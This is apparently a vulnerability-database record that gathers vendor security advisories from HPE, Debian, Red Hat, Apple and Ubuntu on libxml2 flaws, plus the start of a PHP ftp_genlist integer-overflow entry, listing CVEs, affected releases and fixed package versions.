6.8\nCVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8\nCVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE recommends applying the latest OS vendor security patches for libXML2 to\nresolve the vulnerabilities in the libXML2 library. \n\nPlease note that the HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 22 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 2.8.0+dfsg1-7+wheezy5. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.3+dfsg1-1 or earlier versions. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2015:2550-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html\nIssue date: 2015-12-07\nCVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 \n CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 \n CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 \n CVE-2015-8242 CVE-2015-8317 \n=====================================================================\n\n1. Summary:\n\nUpdated libxml2 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSeveral denial of service flaws were found in libxml2, a library providing\nsupport for reading, modifying, and writing XML and HTML files. A remote\nattacker could provide a specially crafted XML or HTML file that, when\nprocessed by an application using libxml2, would cause that application to\nuse an excessive amount of CPU, leak potentially sensitive information, or\nin certain cases crash the application. (CVE-2015-1819, CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941,\nCVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957,\nBZ#1281955)\n\nRed Hat would like to thank the GNOME project for reporting CVE-2015-7497,\nCVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242,\nand CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the\noriginal reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and\nCVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and\nCVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. \nThe CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat\nProduct Security. \n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect. \n\n4. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\naarch64:\nlibxml2-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-1819\nhttps://access.redhat.com/security/cve/CVE-2015-5312\nhttps://access.redhat.com/security/cve/CVE-2015-7497\nhttps://access.redhat.com/security/cve/CVE-2015-7498\nhttps://access.redhat.com/security/cve/CVE-2015-7499\nhttps://access.redhat.com/security/cve/CVE-2015-7500\nhttps://access.redhat.com/security/cve/CVE-2015-7941\nhttps://access.redhat.com/security/cve/CVE-2015-7942\nhttps://access.redhat.com/security/cve/CVE-2015-8241\nhttps://access.redhat.com/security/cve/CVE-2015-8242\nhttps://access.redhat.com/security/cve/CVE-2015-8317\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWZZK6XlSAg2UNWIIRAlx5AKCfIxP9TLM+V/vmQq6MVeUpjiGltgCgnOgZ\nIOmptwborGrgz5fLqra3STg=\n=bVgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-1 iOS 9.3\n\niOS 9.3 is now available and addresses the following:\n\nAppleUSBNetworking\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nFontParser\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIOHIDFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to bypass code signing\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed through improved\npermission validation. \nCVE-ID\nCVE-2016-1751 : Eric Monti of Square Mobile Security\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vila\u00e7a\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nLaunchServices\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to modify events from other\napplications\nDescription: An event handler validation issue existed in the XPC\nServices API. This issue was addressed through improved message\nvalidation. \nCVE-ID\nCVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team\n\nlibxml2\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may auto-fill text\ninto other Message threads\nDescription: An issue existed in the parsing of SMS URLs. This issue\nwas addressed through improved URL validation. \nCVE-ID\nCVE-2016-1763 : CityTog\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nProfiles\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An untrusted MDM profile may be incorrectly displayed as\nverified\nDescription: A certificate validation issue existed in MDM profiles. \nThis was addressed through additional checks. \nCVE-ID\nCVE-2016-1766 : Taylor Boyko working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nSecurity\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTrueTypeScaler\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1778 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1783 : Mihai Parparita of Google\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: An issue existed in the handling of attachment URLs. \nThis issue was addressed through improved URL handling. \nCVE-ID\nCVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc. \n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: A hidden web page may be able to access device-\norientation and device-motion data. This issue was addressed by\nsuspending the availability of this data when the web view is hidden. \nCVE-ID\nCVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. \nShahandashti, and Feng Hao of the School of Computing Science,\nNewcastle University, UK\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may reveal a user\u0027s\ncurrent location\nDescription: An issue existed in the parsing of geolocation\nrequests. This was addressed through improved validation of the\nsecurity origin for geolocation requests. \nCVE-ID\nCVE-2016-1779 : xisigr of Tencent\u0027s Xuanwu Lab\n(http://www.tencent.com)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may be able to access restricted ports\non arbitrary servers\nDescription: A port redirection issue was addressed through\nadditional port validation. \nCVE-ID\nCVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit\nTechnologies Co.,Ltd. \n\nWebKit History\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to an\nunexpected Safari crash\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and \u674e\u666e\u541b of\n\u65e0\u58f0\u4fe1\u606f\u6280\u672fPKAV Team (PKAV.net)\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Redirect responses may have allowed a malicious website\nto display an arbitrary URL and read cached contents of the\ndestination origin. This issue was addressed through improved URL\ndisplay logic. \nCVE-ID\nCVE-2016-1786 : ma.la of LINE Corporation\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: A caching issue existed with character encoding. This\nwas addressed through additional request checking. \nCVE-ID\nCVE-2016-1785 : an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"9.3 \". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JPyAAoJEBcWfLTuOo7tWzQP/i8AwdkoE9uvhfe5X5p1yDxr\nYVcAkvHAgWzNee9Tvc6ERa2KWdOkmbVRGzySyG62lhGnrUTSMtlCs0/Bp/Ui5p65\nFF2viREhDJNA83WZcsFP0ELZVJ5VwUv6BJR0L0ERn7QSfaftAwVSFmyHHURA7rGj\nIRQWnwD6IOblI0veLXjJjN8nPY2ueAzVvyv5mD8c4MdCxwxZNi2X9ugtIBBbZr6Y\narjAVh/wfB0m+f50feDaPvo/8mZDn1UwrDu0YPtGDmGebgX17TE39q0YgOFf0uXv\nHzA0S1+mDURGR3h+7wpyO25+uOPHyGkeIA1GVISA2O7pmHKTcY5pvWC4zyIsDfRC\nziI4AIml9ySY7nIltuUWeUdO81nHrjvEtXyWZ6VBH4Dah4yne80B04UGgLIzD1ON\nhTlTySVnMBJ8+N0g+e3ldGTuf49ISEKh9s6u+ABtBi9+sDSiWxGIkvNuZN37522O\ndK4MsAZIffxbKo2DuJxiWrfIzhAOO3rZbRD8oFkOtKh5QHlS1eOBlN29U9S1Cq+P\njZ/sffscri8q9m8KUx4a+1HG3N6TDIJtIz7/jJyTld2Aw+1JAlU4DG41t1lkEs6S\n41wah3j9YrqXCp2uc3JmcI6k2XW2pj73T9Mqqz5e/xk2sfwnJ299dAK7vXkGR3ix\nFg29LzTb0eQ9Ub1Mkn5E\n=Ouex\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2834-1\nDecember 14, 2015\n\nlibxml2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nlibxml2 could be made to crash if it opened a specially crafted file. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499,CVE-2015-7500)\n\nHugh Davenport discovered that libxml2 incorrectly handled certain\nmalformed documents. (CVE-2015-8241,\nCVE-2015-8242)\n\nHanno Boeck discovered that libxml2 incorrectly handled certain\nmalformed documents. This issue only applied\nto Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-8317)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n libxml2 2.9.2+zdfsg1-4ubuntu0.2\n\nUbuntu 15.04:\n libxml2 2.9.2+dfsg1-3ubuntu0.2\n\nUbuntu 14.04 LTS:\n libxml2 2.9.1+dfsg1-3ubuntu4.6\n\nUbuntu 12.04 LTS:\n libxml2 2.7.8.dfsg-5.1ubuntu4.13\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes",
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"id": "JVNDB-2015-006434"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-446"
}
],
"trust": 0.6
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}
VAR-201506-0265
Vulnerability from variot - Updated: 2026-04-10 22:18Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow. PHP is prone to an integer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php security and bug fix update Advisory ID: RHSA-2015:1135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html Issue date: 2015-06-23 CVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
